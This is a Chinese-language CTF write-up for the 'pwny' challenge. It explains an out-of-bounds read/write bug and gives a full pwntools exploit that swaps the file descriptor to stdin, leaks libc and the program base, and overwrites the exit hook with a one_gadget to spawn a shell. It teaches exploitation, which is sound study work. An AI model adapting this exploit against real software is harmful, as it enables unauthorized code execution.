其他分享
首页 > 其他分享> > pwny

pwny

作者:互联网

checksec发现保护全开,程序扔入IDA

发现程序支持两个功能,读和写

读入部分:

 

 

 

其中0x202860为一个文件标识符,对应的是/dev/urandom,获取的是随机数,程序输出0x202060 + 8 * v1 处的数据

写入部分:

 

 

 

允许输入一个v2,程序在0x202060 + 8 * v2处写入一个字长的随机数

发现读写操作均存在数组越界

首先将0x202860处文件标识符置为0,使得程序可以获取用户输入的数据

方法是通过写操作,在0x202860处写入两次,第一次会在0x202860处写入一个字长的随机数,绝大多数情况下0x202860处是一个不为0~3的数,这样第二次写操作时,程序从0x202860处的文件标识符获得的数据为0,则会在0x202860处写入一个字长的0x00,此时0x202860即为0,对应标准输入

之后便可以进行任意位置读写

通过读操作可以获得got表(这里选用的是puts的got)从而泄露libc地址,在0x202008处可以泄露程序基地址

之后利用exit_hook,在_rtld_lock_unlock_recursive处写入one_gadgets,从而获得shell

 

exp如下:

from pwn import *

 

#io = gdb.debug('./pwny', 'b *$rebase(0x850)')

io = process('./pwny')

#io = connect('139.9.133.151', 21857)

elf = ELF('./pwny')

libc = elf.libc

one_gadget1 = 0x4f3d5

one_gadget2 = 0x4f432

one_gadget3 = 0x10a41c

 

io.recvuntil('Your choice: ')

io.sendline('2')

io.recvuntil('Index: ')

io.sendline('256')

 

io.recvuntil('Your choice: ')

io.sendline('2')

io.recvuntil('Index: ')

io.sendline('256')

 

io.recvuntil('Your choice: ')

io.sendline('1')

io.recvuntil('Index: ')

io.send(b'\xe7'+ b'\xff'*7)

io.recvuntil('Result: ')

puts_got = int(io.recv(12), 16)

info("puts_got:" + hex(puts_got))

libc_base = puts_got - libc.symbols['puts']

info("libc_base:" + hex(libc_base))

 

io.recvuntil('Your choice: ')

io.sendline('1')

io.recvuntil('Index: ')

io.send(b'\xf5'+ b'\xff'*7)

io.recvuntil('Result: ')

pro_offset = int(io.recv(12), 16)

elf_base = pro_offset - 0x202008

info("elf_base:" + hex(elf_base))

off_base = elf_base + 0x202060

 

io.recvuntil('Your choice: ')

io.sendline('2')

io.recvuntil('Index: ')

io.sendline(str((libc_base + 0x61b060 + 3848 - off_base) // 8))

io.send(p64(libc_base + one_gadget2))

 

io.recvuntil('Your choice: ')

io.sendline('3')

 

io.interactive()

 

标签:libc,0x202860,pwny,base,sendline,io,recvuntil
来源: https://www.cnblogs.com/hktk1643/p/14774444.html